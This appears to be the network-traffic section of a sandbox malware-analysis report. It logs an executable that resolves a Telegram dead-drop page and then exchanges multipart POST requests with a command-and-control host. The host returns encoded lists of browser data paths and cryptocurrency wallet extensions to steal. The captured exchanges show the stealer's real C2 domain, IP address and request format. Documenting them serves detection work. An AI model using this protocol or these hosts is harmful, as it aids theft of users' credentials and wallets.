Mar 19, 2025 14:02:26.377614021 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.378061056 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.378113985 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.378120899 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.406423092 CET	49713	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.465610027 CET	443	49713	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.467097998 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.467114925 CET	443	49713	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.467195034 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.467195988 CET	49713	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.467207909 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.470412016 CET	49713	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.470434904 CET	443	49713	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.471910954 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.471942902 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.472090006 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.472098112 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.472223043 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.475224018 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.481487036 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.481518984 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.481585979 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.481601000 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.482285976 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.488805056 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.494160891 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.494196892 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.494349003 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.494365931 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.494477034 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.501012087 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.507030964 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.507062912 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.507091999 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.507102966 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.507169008 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.513556957 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.561259031 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.561306953 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.561330080 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.561331987 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.561342001 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.561408997 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.561417103 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.562141895 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.566051960 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.566109896 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.566138983 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.566227913 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.566232920 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.566291094 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.566400051 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.571206093 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.571247101 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.571340084 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.571345091 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.571456909 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.577253103 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.584542990 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.584582090 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.584642887 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.584649086 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.584734917 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.590605974 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.596777916 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.596832037 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.596854925 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.596860886 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.596920967 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.603511095 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.608901024 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.609021902 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.609026909 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.609038115 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.609124899 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.615732908 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.620172977 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.620327950 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.620354891 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.620359898 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.620448112 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.625278950 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.630167007 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.630223036 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.630247116 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.630254984 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.630364895 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.634481907 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.639861107 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.639903069 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.639925957 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.639931917 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.639985085 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.644298077 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655419111 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655477047 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655495882 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.655500889 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655529022 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655544043 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.655549049 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.655695915 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.658976078 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.659579992 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.659612894 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.659638882 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.659662962 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.659668922 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.659692049 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.663096905 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.663199902 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.663204908 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.665323019 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.665390015 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.665395021 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.667874098 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.667958021 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.667963028 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.670696020 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.670845985 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.670850039 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.673232079 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.673377037 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.673381090 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.676122904 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.676213026 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.676218033 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.679023027 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.679131031 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.679136038 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.682670116 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.683527946 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.683532000 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.684568882 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.685791969 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.685796022 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.690977097 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.693201065 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.693205118 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.697288990 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.697382927 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.697387934 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.697412014 CET	443	49711	142.250.186.164	192.168.2.10
Mar 19, 2025 14:02:26.697511911 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.697837114 CET	49711	443	192.168.2.10	142.250.186.164
Mar 19, 2025 14:02:26.697849035 CET	443	49711	142.250.186.164	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 19, 2025 14:00:10.086121082 CET	63495	53	192.168.2.10	1.1.1.1
Mar 19, 2025 14:00:10.093422890 CET	53	63495	1.1.1.1	192.168.2.10
Mar 19, 2025 14:00:11.666421890 CET	55828	53	192.168.2.10	1.1.1.1
Mar 19, 2025 14:00:11.682214975 CET	53	55828	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:23.813159943 CET	53	49976	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:23.926227093 CET	53	58955	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:24.908086061 CET	57963	53	192.168.2.10	1.1.1.1
Mar 19, 2025 14:02:24.908375978 CET	53493	53	192.168.2.10	1.1.1.1
Mar 19, 2025 14:02:24.914949894 CET	53	57963	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:24.915292978 CET	53	53493	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:26.062863111 CET	53	57428	1.1.1.1	192.168.2.10
Mar 19, 2025 14:02:26.193135023 CET	53	50764	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 19, 2025 14:00:10.086121082 CET	192.168.2.10	1.1.1.1	0xba31	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:00:11.666421890 CET	192.168.2.10	1.1.1.1	0xa76	Standard query (0)	y.p.formaxprime.co.uk	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:02:24.908086061 CET	192.168.2.10	1.1.1.1	0x649e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:02:24.908375978 CET	192.168.2.10	1.1.1.1	0x882d	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 19, 2025 14:00:10.093422890 CET	1.1.1.1	192.168.2.10	0xba31	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:00:11.682214975 CET	1.1.1.1	192.168.2.10	0xa76	No error (0)	y.p.formaxprime.co.uk	78.47.63.132	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:02:24.914949894 CET	1.1.1.1	192.168.2.10	0x649e	No error (0)	www.google.com	142.250.186.164	A (IP address)	IN (0x0001)	false
Mar 19, 2025 14:02:24.915292978 CET	1.1.1.1	192.168.2.10	0x882d	No error (0)	www.google.com		65	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

y.p.formaxprime.co.uk

www.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49681	149.154.167.99	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:10 UTC	90	OUT	GET /g_etcontent HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:11 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 19 Mar 2025 13:00:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12411 Connection: close Set-Cookie: stel_ssid=a95a95c28573b44b36_4621748884215959652; expires=Thu, 20 Mar 2025 13:00:10 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-03-19 13:00:11 UTC	12411	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 5f 65 74 63 6f 6e 74 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g_etcontent</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49682	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:12 UTC	179	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49683	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:13 UTC	271	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbs User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:13 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 41 35 35 41 30 43 30 44 33 33 32 36 33 32 34 32 37 36 35 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 2d 2d 0d Data Ascii: ------90r90zuknop8ym7qiwbsContent-Disposition: form-data; name="hwid"F3A55A0C0D332632427659-a33c7340-61ca------90r90zuknop8ym7qiwbsContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------90r90zuknop8ym7qiwbs--
2025-03-19 13:00:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:14 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|5db94ad8854c4b4b48c7c8e4f6bb3688\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49684	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:15 UTC	271	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----djecjectjectjectri58 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:15 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74 Data Ascii: ------djecjectjectjectri58Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------djecjectjectjectri58Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------djecjectjectjectri58Cont
2025-03-19 13:00:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:15 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49685	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:17 UTC	271	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----hvkf3eu3o8gln7qqqq1d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-03-19 13:00:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74 Data Ascii: ------hvkf3eu3o8gln7qqqq1dContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------hvkf3eu3o8gln7qqqq1dContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------hvkf3eu3o8gln7qqqq1dCont
2025-03-19 13:00:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 19 Mar 2025 13:00:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-03-19 13:00:17 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49686	78.47.63.132	443	6980	C:\Users\user\Desktop\random(2).exe

Timestamp	Bytes transferred	Direction	Data
2025-03-19 13:00:20 UTC	271	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----as268yukfusrqq9rim79 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0 Host: y.p.formaxprime.co.uk Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
